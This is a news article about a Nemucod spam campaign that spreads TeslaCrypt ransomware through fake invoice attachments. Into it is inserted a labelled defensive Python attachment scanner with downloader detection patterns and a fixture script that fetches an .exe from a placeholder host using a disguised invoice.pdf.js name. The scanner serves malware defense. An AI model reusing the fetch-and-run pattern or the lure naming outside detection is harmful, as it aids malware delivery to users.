Intense Nemucod Malware Campaign Spreads Teslacrypt Ransomware


TeslaCrypt ransomware infections continue to surge. We reported last week on the first signs of a new TeslaCrypt campaign that was slowly taking shape. Only a few days later, it is clear that those initial reports were correct and that we are in the midst of a large-scale TeslaCrypt attack.

As initially reported, the first signs appeared on the Bleeping Computer forums, where users were complaining about TeslaCrypt infections.

A further investigation by Heimdal Security revealed the dangerous spam-powered campaign behind these infections, which at that time affected mostly users in Scandinavian countries.

The campaign escalated during the past week

Several other cyber-security vendors also noted a rise in TeslaCrypt detections during the week, and today ESET's team published an in-depth technical write-up on the new campaign, confirming Heimdal's initial research.

The infection chain is simple:

1. The user receives a spam email about an unpaid invoice.

2. The user downloads the email attachment, an archive booby-trapped with the Nemucod trojan.

3. The user unzips the archive and runs the JavaScript file inside; Nemucod's script downloads an EXE file from the Internet.

4. The EXE file is executed automatically.

5. The TeslaCrypt ransomware is installed.
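As an added example (not code from the article, ESET or Heimdal), the following Python shows a mail-gateway style check aimed at steps 2 and 3 of that chain: it opens a ZIP attachment in memory, flags members whose extension Windows Script Host would execute on double-click, and scans those members for generic fetch-and-run building blocks. The COM object names and regular expressions are assumptions about what a script downloader typically needs, not signatures taken from this campaign; the sample attachments are constructed fixtures with a non-routable URL.

```python
"""Mail-gateway style attachment check for zipped script downloaders.

Added example, not code from the article or from ESET/Heimdal. It inspects a
ZIP attachment in memory, flags members that Windows Script Host would run on
double-click, and looks inside them for generic downloader building blocks.
"""
from __future__ import annotations

import io
import re
import zipfile
from dataclasses import dataclass, field

# Extensions Windows Script Host executes directly when the user opens them.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}

# Assumed indicators of a fetch-and-run script: generic JScript/VBScript COM
# objects and calls, not signatures taken from the article.
DOWNLOADER_INDICATORS = {
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_writer": re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject", re.I),
    "process_launch": re.compile(r"WScript\.Shell|\.Run\s*\(|\.Exec\s*\(", re.I),
    "exe_payload": re.compile(r"\.exe\b", re.I),
}

MAX_SCAN_BYTES = 1024 * 1024  # a downloader script is tiny; cap work per member


@dataclass
class Finding:
    member: str
    reasons: list[str] = field(default_factory=list)


def analyze_attachment(zip_bytes: bytes) -> list[Finding]:
    """Return one Finding per ZIP member that looks like a script downloader lure."""
    findings: list[Finding] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            basename = info.filename.rsplit("/", 1)[-1].lower()
            parts = basename.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext not in SCRIPT_EXTENSIONS:
                continue
            reasons = [f"script extension {ext}"]
            # "invoice.pdf.js": Explorer hides the real extension by default,
            # so the user believes they are opening a document.
            if len(parts) > 2:
                reasons.append("double extension disguises script as a document")
            body = zf.read(info.filename)[:MAX_SCAN_BYTES].decode("latin-1")
            hits = [name for name, rx in DOWNLOADER_INDICATORS.items() if rx.search(body)]
            if hits:
                reasons.append("downloader indicators: " + ", ".join(hits))
            findings.append(Finding(info.filename, reasons))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Map findings to a gateway action: block, quarantine or allow."""
    for f in findings:
        if any(r.startswith(("downloader indicators", "double extension")) for r in f.reasons):
            return "block"
    return "quarantine" if findings else "allow"


def _zip_single(name: str, text: str) -> bytes:
    """Build an in-memory ZIP with one member (test fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, text)
    return buf.getvalue()


def build_lure_attachment() -> bytes:
    """Constructed fixture shaped like the campaign's lure: a ZIP holding a .js
    named like an invoice. The body is inert text carrying only the indicator
    strings; the URL is a non-routable placeholder."""
    script = (
        'var req = new ActiveXObject("MSXML2.XMLHTTP");\n'
        'req.open("GET", "http://example.invalid/update.exe", false);\n'
        '/* body omitted: write via ADODB.Stream, then WScript.Shell .Run() */\n'
    )
    return _zip_single("invoice_0312.pdf.js", script)


def build_benign_attachment() -> bytes:
    """Constructed fixture: a PDF-looking member, which must pass."""
    return _zip_single("invoice_0312.pdf", "%PDF-1.4\n%constructed test document\n")


if __name__ == "__main__":
    for label, blob in (("lure", build_lure_attachment()), ("benign", build_benign_attachment())):
        found = analyze_attachment(blob)
        print(f"{label}: {verdict(found)}")
        for f in found:
            print(f"  {f.member}: {'; '.join(f.reasons)}")
```

The check is deliberately conservative: a script file with no downloader indicators is quarantined rather than blocked, while a disguised or fetch-and-run script is blocked outright. On the endpoint side, step 3 only works because Windows Script Host runs the .js file when the user opens it, so reassociating .js/.jse with a text editor, or disabling Windows Script Host, stops the EXE from ever being fetched even when the email gets through the gateway (general hardening advice, not a measure the article describes).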

According to ESET, over the past few days the company's security products detected and stopped numerous such infections around the world, with the bulk of them in Japan.

ESET reports that at one point, for a span of two days, 75% of all malware detections in Japan were related to this Nemucod-TeslaCrypt campaign.

Similarly high numbers were reported in Italy (30%), Spain (23%), the US (15%), Canada (15%) and Argentina (14%). Globally, the campaign accounted for 10% of detections.

“The fact that the number of affected users has not been as high as in previous ransomware campaigns despite the elevated number of detections is good news,” says ESET’s Josep Albors. “It means that the users are using protection measures capable of detecting new threats and it can also mean that they are not executing suspicious files attached to emails like the one we’ve analyzed.”

TeslaCrypt ransomware infections, heatmap